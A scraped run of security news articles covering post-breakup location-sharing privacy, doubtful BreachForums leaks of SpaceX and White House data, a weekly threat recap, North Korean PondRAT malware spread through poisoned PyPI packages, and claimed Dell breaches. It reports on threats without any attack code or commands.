*   Modern devices come pre-installed with anti-theft services called “Find My” on iPhones and “Find My Device” on Android phones. These are the same services that many couples use to track one another’s location, and turning these services off will shut off access that other people (including exes, friends, and family) have to your location.
    
    *   Alternatively, you can turn off location sharing with one person only rather than turning off location sharing all together. You can review location sharing settings on iPhone here.
    
    *   You can review location sharing settings on Android here.

**7\. **Review the location settings of individual apps****

*   If you want to keep location sharing on for convenience, you can review individual apps on your device and select how you would like your location to be accessed by those apps.
    
    *   iPhones allow you to choose one of several options for how frequently apps will access and use your location: Never, Ask Next Time Or When I Share, While Using the App, or Always. You can review location sharing settings on iPhone here.
    
    *   Android phones allow you to choose one of several options for how frequently apps will access and use your location: Allowed all the time, Allowed only while in use, and Not allowed.
    *   You can review location sharing settings on Android here.

**8\. **Maintain your ongoing security and privacy****

*   If you find it safe and necessary, block your ex on certain social media platforms, messaging apps, etc.
*   Review the privacy settings of social media apps to ensure that your posts are not inadvertently shared with an ex.
    *   Consider whether your ex could see your posts because you have mutual friends who may reveal your posts to your ex.
*   Review automatic cloud backups for photos you take with your smartphone.
    *   If your ex compromises your iCloud or Google Photos account—and your photos are automatically backed up to those accounts—they could retrieve sensitive photos that you want to keep private.
*   When entering a new relationship, have a conversation about consensually and safely sharing your location (or choosing not to).

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Relationship broken up? Here&#8217;s how to separate your online accounts 

A cybercriminal posted free data sets on the infamous BreachForums, but are these actually worth looking at?

A cybercriminal has released internal data online that they say has come from leaks at several high-profile sources, including SpaceX, CNN, and the White House.

However, there are some questions around the reliability and usefulness of the released data, so we took a closer look.

When it comes to the the SpaceX data set, the poster is apparently not a big fan of Elon Musk.

_BreachForums post about SpaceX data_

Their post on data leak site BreachForums says:

> “Today I present data from Spacex, because F\*\*\* you elon musk, thats why LOL
> 
> The leak contains, Emails, Hashes, Numbers, Hosts, IP’s”

But looking at the data we spotted some strange looking entries.

For example, by searching for Elon’s email address we found all these:

_Now I still don’t know where to send the pitch for my brilliant Mars colonization idea._

SpaceX has not acknowledged this data breach, and it doesn’t seem likely that it will.

Moving on to the White House data set, we also found something that looked odd while looking at the email addresses. A lot of them seem to be composed of German words followed by the @whitehouse.gov domain name.

Potentially fabricated whitehouse.gov email addresses

Again, the breach claim has not been acknowledged, nor do we expect it to be.

The same poster claims to have breached another company, Up North Pride, by impersonating a police officer:

> “I sent them a fake data request from a law enforcement email, and they handed over what they had and this is what they handed over”

In this case, looking at the data, the email addresses of the partnering organizations at least look real.

The motive of the cybercriminal for posting the way they did is unclear. Many of these posters are just looking for attention, potentially hoping to sell some of the data by getting their name out there. Or they are trying to annoy some of the people they don’t like.

For now, we wait and see, but it’s probably not worth giving it the time of day.

If you want to find out if your personal data was exposed through a data breach, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you use most frequently to sign up for sites and services) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 SpaceX, CNN, and The White House internal data allegedly published online. Is it real? 

Hold on tight, folks, because last week's cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling "dream jobs" to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let's dive into the details and see what lessons we can glean

Cybersecurity / Cyber Threat

Hold on tight, folks, because last week's cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling "dream jobs" to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let's dive into the details and see what lessons we can glean from the past week.

****⚡ Threat of the Week****

**Raptor Train Botnet Dismantled:** The U.S. government announced the takedown of the Raptor Train botnet controlled by a China-linked threat actor known as Flax Typhoon. The botnet consisted of over 260,000 devices in June 2024, with victims scattered across North America, Europe, Asia, Africa, and Oceania, and South America. It also attributed the Flax Typhoon threat actor to a publicly-traded, Beijing-based company known as Integrity Technology Group.

****🔔 Top News****

*   **Lazarus Group's New Malware:** The North Korea-linked cyber espionage group known as UNC2970 (aka TEMP.Hermit) has been observed utilizing job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN. The activity is also tracked as Operation Dream Job.
*   **iServer and Ghost Dismantled:** In yet another big win for law enforcement agencies, Europol announced the takedown of an international criminal network that leveraged a phishing platform to unlock stolen or lost mobile phones. The agency, in partnership with the Australian Federal Police (AFP), dismantled an encrypted communications network called Ghost that enabled serious and organized crime across the world.
*   **Iranian APT Acts as Initial Access Provider:** An Iranian threat actor tracked as UNC1860 is acting as an initial access facilitator that provides remote access to target networks by deploying various passive backdoors. This access is then leveraged by other Iranian hacking groups affiliated with the Ministry of Intelligence and Security (MOIS).
*   **Apple Drops Lawsuit against NSO Group:** Apple filed a motion to "voluntarily" dismiss the lawsuit it's pursuing against Israeli commercial spyware vendor NSO Group, citing a shifting risk landscape that could lead to exposure of critical "threat intelligence" information. The lawsuit was filed in November 2021.
*   **Phishing Attacks Exploit HTTP Headers:** A new wave of phishing attacks is abusing refresh entries in HTTP headers to deliver spoofed email login pages that are designed to harvest users' credentials. Targets of the campaigns include entities in South Korea and the U.S.

****📰 Around the Cyber World****

*   **Sandvine Leaves 56 "Non-democratic" Countries:** Sandvine, the company behind middleboxes that have facilitated the delivery of commercial spyware as part of highly-targeted attacks, said it has exited 32 countries and is in process of ceasing operations in another 24 countries, citing elevated threats to digital rights. Earlier this February, the company was added to the U.S. Entity List. "The misuse of deep packet inspection technology is an international problem that threatens free and fair elections, basic human rights, and other digital freedoms we believe are inalienable," it said. It did not disclose the list of countries it's exiting as part of the overhaul.
*   **.mobi Domain Acquired for $20:** Researchers from watchTowr Labs spent a mere $20 to acquire a legacy WHOIS server domain associated with the .mobi top-level domain (TLD) and set up a WHOIS server on that domain. This led to the discovery that over 135,000 unique systems still queried the old WHOIS server over a five day period ending on September 4, 2024, including cybersecurity tools and mail servers for government, military and university entities. The research also showed that the TLS/SSL process for the entire .mobi TLD had been undermined as numerous Certificate Authorities (CAs) were found to be still using the "rogue" WHOIS server to "determine the owners of a domain and where verification details should be sent." Google has since called for stopping the use of WHOIS data for TLS domain verifications.
*   **ServiceNow Misconfigurations Leak Sensitive Data:** Thousands of companies are inadvertently exposing secrets from their internal knowledge base (KB) articles via ServiceNow misconfigurations. AppOmni attributed the issue to "outdated configurations and misconfigured access controls in KBs," likely indicating "a systematic misunderstanding of KB access controls or possibly the accidental replication of at least one instance's poor controls to another through cloning." ServiceNow has published guidance on how to configure their instances to prevent unauthenticated access to KB articles.
*   **Google Cloud Document AI Flaw Fixed:** Speaking of misconfigurations, researchers have found that overly permissive settings in Google Cloud's Document AI service could be leveraged by threat actors to hack into Cloud Storage buckets and steal sensitive information. Vectra AI described the vulnerability as an instance of transitive access abuse.
*   **Microsoft Plans End of Kernel Access for EDR Software:** Following the massive fallout from the CrowdStrike update mishap in July 2024, Microsoft has highlighted Windows 11's "improved security posture and security defaults" that allow for more security capabilities to security software makers outside of kernel mode access. It also said it will collaborate with ecosystem partners to achieve "enhanced reliability without sacrificing security."

**🔥 **Cybersecurity Resources & Insights******— **Upcoming Webinars****

*   **Zero Trust: Anti-Ransomware Armor**: Join our next webinar with Zscaler's Emily Laufer for a deep dive into the 2024 Ransomware Report, uncovering the latest trends, emerging threats, and the zero-trust strategies that can safeguard your organization. Don't become another statistic – Register now and fight back!
*   **SIEM Reboot: From Overload to Oversight:** Drowning in data? Your SIEM should be a lifesaver, not another headache. Join us to uncover how legacy SIEM went wrong, and how a modern approach can simplify security without sacrificing performance. We'll dive into the origins of SIEM, its current challenges, and our community-driven solutions to cut through the noise and empower your security. Register now for a fresh take on SIEM!

**— **Ask the Expert****

*   **Q:** How does Zero Trust differ fundamentally from traditional Perimeter Defense, and what are the key challenges and advantages when transitioning an organization from a Perimeter Defense model to a Zero Trust architecture?

*   **A:** Zero Trust and perimeter defense are two ways to protect computer systems. Zero Trust is like having multiple locks on your doors AND checking IDs at every room, meaning it trusts no one and constantly verifies everyone and everything trying to access anything. It's great for stopping hackers, even if they manage to sneak in, and works well when people work from different places or use cloud services. Perimeter defense is like having a strong wall around your castle, focusing on keeping the bad guys out. But, if someone breaks through, they have easy access to everything inside. This older approach struggles with today's threats and remote work situations. Switching to Zero Trust is like upgrading your security system, but it takes time and money. It's worth it because it provides much better protection. Remember, it's not just one thing, but a whole new way of thinking about security, and you can start small and build up over time. Also, don't ditch the wall completely, it's still useful for basic protection.

**— **Cybersecurity Jargon Buster****

*   **Polymorphic Malware:** Imagine a sneaky virus that keeps changing its disguise (signature) to trick your antivirus. It's like a chameleon, making it tough to catch.
*   **Metamorphic Malware:** This one's even trickier! It's like a shapeshifter, not just changing clothes, but completely transforming its body. It rewrites its own code each time it infects, making it nearly impossible for antivirus to recognize.

**— **Tip of the Week****

**"Think Before You Click" Maze:** Navigate a series of decision points based on real-world scenarios, choosing the safest option to avoid phishing traps and other online threats.

****Conclusion****

"To err is human; to forgive, divine." - Alexander Pope. But in the realm of cybersecurity, forgiveness can be costly. Let's learn from these mistakes, strengthen our defenses, and keep the digital world a safer place for all.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Last Week's Top Threats and Trends (September 16-22)

Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.
PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in

Software Security / Supply Chain

Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign.

PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in attacks related to the 3CX supply chain compromise last year.

Some of these attacks are part of a persistent cyber attack campaign dubbed Operation Dream Job, wherein prospective targets are lured with enticing job offers in an attempt to trick them into downloading malware.

"The attackers behind this campaign uploaded several poisoned Python packages to PyPI, a popular repository of open-source Python packages," Unit 42 researcher Yoav Zemah said, linking the activity with moderate confidence to a threat actor called Gleaming Pisces.

The adversary is also tracked by the wider cybersecurity community under the names Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736, a sub-cluster within the Lazarus Group that's also known for distributing the AppleJeus malware.

It's believed that the end goal of the attacks is to "secure access to supply chain vendors through developers' endpoints and subsequently gain access to the vendors' customers' endpoints, as observed in previous incidents."

The list of malicious packages, now removed from the PyPI repository, is below -

*   real-ids (893 downloads)
*   coloredtxt (381 downloads)
*   beautifultext (736 downloads)
*   minisound (416 downloads)

The infection chain is fairly simple in that the packages, once downloaded and installed on developer systems, are engineered to execute an encoded next-stage that, in turn, runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server.

Further analysis of PondRAT has revealed similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux variants of POOLRAT.

"The Linux and macOS versions \[of POOLRAT\] use an identical function structure for loading their configurations, featuring similar method names and functionality," Zemah said.

"Additionally, the method names in both variants are strikingly similar, and the strings are almost identical. Lastly, the mechanism that handles commands from the \[command-and-control server\] is nearly identical."

PondRAT, a leaner version of POOLRAT, comes with capabilities to upload and download files, pause operations for a predefined time interval, and execute arbitrary commands.

"The evidence of additional Linux variants of POOLRAT showed that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms," Unit 42 said.

"The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."

The disclosure comes as KnowBe4, which was duped into hiring a North Korean threat actor as an employee, said more than a dozen companies "either hired North Korean employees or had been besieged by a multitude of fake resumes and applications submitted by North Koreans hoping to get a job with their organization."

It described the activity, tracked by CrowdStrike under the moniker Famous Chollima, as a "complex, industrial, scaled nation-state operation" and that it poses a "serious risk for any company with remote-only employees."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New PondRAT Malware Hidden in Python Packages Targets Software Developers

Another day, another claim of Dell data breach!

Hackers claim a second Dell data breach within a week, exposing sensitive internal files via compromised Atlassian tools. Allegedly, data from Jira, Jenkins, and Confluence was leaked. Dell is already investigating the first incident.

On September 19, 2024, _Hackread.com_ **published an exclusive report** detailing claims of a Dell data breach involving sensitive information related to 10,863 Dell employees. The same hacker behind the original breach is now claiming that Dell has been “breached again,” suggesting a larger ongoing issue.

The hacker, who operates under the alias “grep” on the infamous cybercrime platform Breach Forums, posted these claims on Sunday, September 22, 2024. In this post, “grep” revealed that Dell has suffered another significant breach, this time with the help of a fellow hacker known as “Chucky.” Together, they allegedly compromised Dell’s internal systems, exposing confidential data.

According to “grep,” the breach contains data related to Jira files, database tables, and schema migrations, amounting to a total of 3.5 GB of uncompressed data. The hackers claim to have gained access by compromising Dell’s Atlassian software suite, including Jenkins and Confluence, widely used tools for software development and collaboration.

Here’s the exact message shared by the hacker on the forum:

_Compromised data: Jira’s files, DB tables, schema migration, etc., totalling_ 3.5GB uncompressed. This time, it was breached by Chucky. Before Dell makes any claims, we both compromised your Atlassian and accessed Jenkins, Confluence, etc.  
GDPR said time is ticking, by the way, _xD._

The hacker on Breach Forum announcing his leak (Screenshot credit: Hackread.com)

In response to the first alleged breach, Dell told _Hackread.com_ that it was aware of the situation and had launched an investigation. However, as of now, the company has not addressed the latest breach claims.

The _Hackread.com_ research team has analyzed some of the files and determined that they likely contain sensitive information about Dell’s internal infrastructure. This includes system configurations, user credentials, security vulnerabilities, and development processes. If confirmed, this information could potentially be leveraged to target Dell’s systems on a much larger scale.

Further review of the leaked files suggests that they belong to a variety of enterprise tools and environments used by Dell, including Jira, database tables, schemas, and Atlassian tools such as Jenkins and Confluence. For security reasons, we are withholding specific details of the compromised files.

Screenshot from the leaked data Screenshot credit: Hackread.com)

_Hackread.com_ has reached out to Dell for a comment and will update this article as the story develops.

1.  **Hacker Leaks Data of 33,000 Accenture Employees**
2.  **Acer Online Store Hacked; 34,000 Customers’ Data Stolen**
3.  **Hacker Leaks Thousands of Microsoft and Nokia Employee Data**
4.  **Shadow IT: Personal GitHub Repos Expose Employee Cloud Secrets**
5.  **Nissan Confirms Data Breach Affected 100K Customers, Employees**

Tag

#git